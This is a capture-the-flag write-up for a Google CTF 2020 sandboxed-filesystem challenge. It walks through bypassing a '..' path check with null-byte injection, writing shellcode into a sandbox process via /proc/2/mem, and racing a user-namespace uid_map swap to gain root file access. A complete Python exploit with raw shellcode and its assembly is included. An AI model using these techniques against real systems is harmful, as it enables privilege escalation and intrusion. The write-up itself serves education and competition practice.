- Original Description
- The task
- Step 1: path check
- Step 2: sandboxed RCE
- Step 3: namespace and fsuid shenanigans
- Exploit code
A remote filesystem with protobufs and namespace-based security. You can find the flag at /home/user/flag (read-only by root)
The task is basically a single C++ daemon that does the following:
- Starts as root (uid 0)
- Forks a sandbox process:
- Does a
- Mounts a
/tmpin the new namespace
- Setuids to 1338 using
- Sets uid and gid maps from the parent to only allow UID 0 and UID 1338
- Starts a very basic
- Does a
- Drops all capabilities
- Starts serving two kinds of requests with a simple protobuf serialization:
- Write to a file. Parameters are filename, data and offset
- Read from a file. Parameters are filename, size and offset
- The trick is that each operation is handled by first jumping into a sandbox:
fork()is called, along with a
waitpid()in the parent
- The child attaches to the user namspace of the sandbox process
setfsuid()s to uid 1338
- attaches to the MNT and NET namespaces of the sandbox too
- Then does the operation
- Reading a file is done with a vanilla ifstream
- Writing a to a file is a bit more complicated:
- The string is split at
/is opened and set as the current fd
- For each string part,
mkdirat()is called, and if it returns with
EEXIST, it is just
- The last part is
- A stream is created from the returned fd
- The string is split at
Step 1: path check
Both operations first check the "path" parameter of the operation by running
strstr(s, "..") on the
c_str() of the string. This is obviously vulnerable to null character injection, since both protobuf and C++ strings allow 0 characters in the string, because they both store the length. So the following path will be accepted:
Unfortunately this only works for writing files, because of how the recursive creation function is constructed
Step 2: sandbox process RCE
Now that we can write any file, we might as well just overwrite the only thing we can actually overwrite without proper capabilities: the sandbox process. This process is always at pid 2 in the task running infrastructure, and it is not ASLR-aware, so we can just write the shellcode into its while loop:
do_write("dummy\0/../../../../../proc/2/mem", SHELLCODE, offset=0x401B9B)
We have to be careful however, since we cannot exit from this process, because it would destroy the namespaces that the original daemon uses.
Unfortunately this process does not access much, so we will still have to PWN the UID0 process somehow.
Step 3: namespace and fsuid shenanigans
At this stage, even if we symlink /tmp to root to do read arbitrary read, we still can't read the flag, as it is probably
chown 0:0 and
chmod 400, and fsuid is set to 1338 before every operation.
But there is a way to make this work: with UID maps.
First, we create one more layer of namespaces from the sandbox process by calling
Then, from the original daemon, since we are still root, we can set almost any UID map as long as it is a subset of the parent UID map. (Seting the uid_map from the unprivileged process is way more restricted).
So we set the following:
1338 0 1 0 1338 1
The above map will swap root and the unprivileged user. This is necessary, because both users are used, and these maps cannot overlap in source or destination.
This is a bit hard, since this has to be done with a race:
- The daemon has to start processing the Write request, and enter the namespace
- Then the sandbox process has to do the unsharing (which will make it impossible to anyone ever entering that user namespace again until the uid_map is filled)
- Then the daemon needs to actually write the uid_map
After a few tries it usually works though.
When all this is set up, calling
setfsuid(1338) from the daemon, after it entered this namespace will actually cause it to have UID 0 as the fsuid in the root namespace, allowing it to read files as root.
(TBH I'm surprised it did not explode at this point)
Reading the flag with a simple read using the root symlink will then give the flag:
The following python code was used, after generating the python version of the supplied protobuf schema:
#!/usr/bin/env python3 import nsfs_pb2 import sys import struct import time def do_operation(operation): operation_as_str = operation.SerializeToString() sys.stdout.buffer.write(struct.pack("I", len(operation_as_str))) sys.stdout.buffer.write(operation_as_str) sys.stdout.buffer.flush() def do_write(path, data, offset=None): operation = nsfs_pb2.Operation() operation.action = nsfs_pb2.WRITE operation.path = path operation.data = data if offset: operation.offset = offset do_operation(operation) def do_read(path, length): operation = nsfs_pb2.Operation() operation.action = nsfs_pb2.READ operation.path = path operation.length = length do_operation(operation) EXECVE_SH = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05" SYMLINK_ROOT = b"\x48\x31\xd2\x48\x31\xf6\xbb\x2f\x00\x00\x00\x53\x48\x89\xe7\x48\xbb\x2f\x74\x6d\x70\x2f\x72\x00\x00\x53\x48\x89\xe6\xb0\x58\x0f\x05" UNSHARE_USERNS = b'\xbf\x00\x00\x02\x50\x66\xb8\x10\x01\x0f\x05' STOP = b'\xeb\xfe' do_write("dummy1", b"lel") do_read("dummy1", 1000) do_read("r/tmp/dummy1", 1000) do_write("dummy\0/../../../../../proc/2/mem", SYMLINK_ROOT + UNSHARE_USERNS + STOP, 0x401B9B) time.sleep(0.9) for _ in range(100): do_write("dummy\0/../../../../../proc/2/uid_map", b"1338 0 1\n0 1338 1\n") time.sleep(1) do_read("r/home/user/flag", 1000)
The shellcodes roughly correspond to the following assembly code:
section .text global _start _start: xor rdx, rdx xor rsi, rsi mov rbx,'/' push rbx mov rdi, rsp mov rbx,'/tmp/r' push rbx mov rsi, rsp mov al, 88 ; symlink syscall mov rdi, 0x50200000 ; CLONE_NEWUSER + CLONE_NEWNET + CLONE_NEWNS mov ax, 272 ; unshare syscall infinite: jmp infinite
It was run as
./solution.py| nc namespacefs.2020.ctfcompetition.com 1337, and it usually works in a few tries.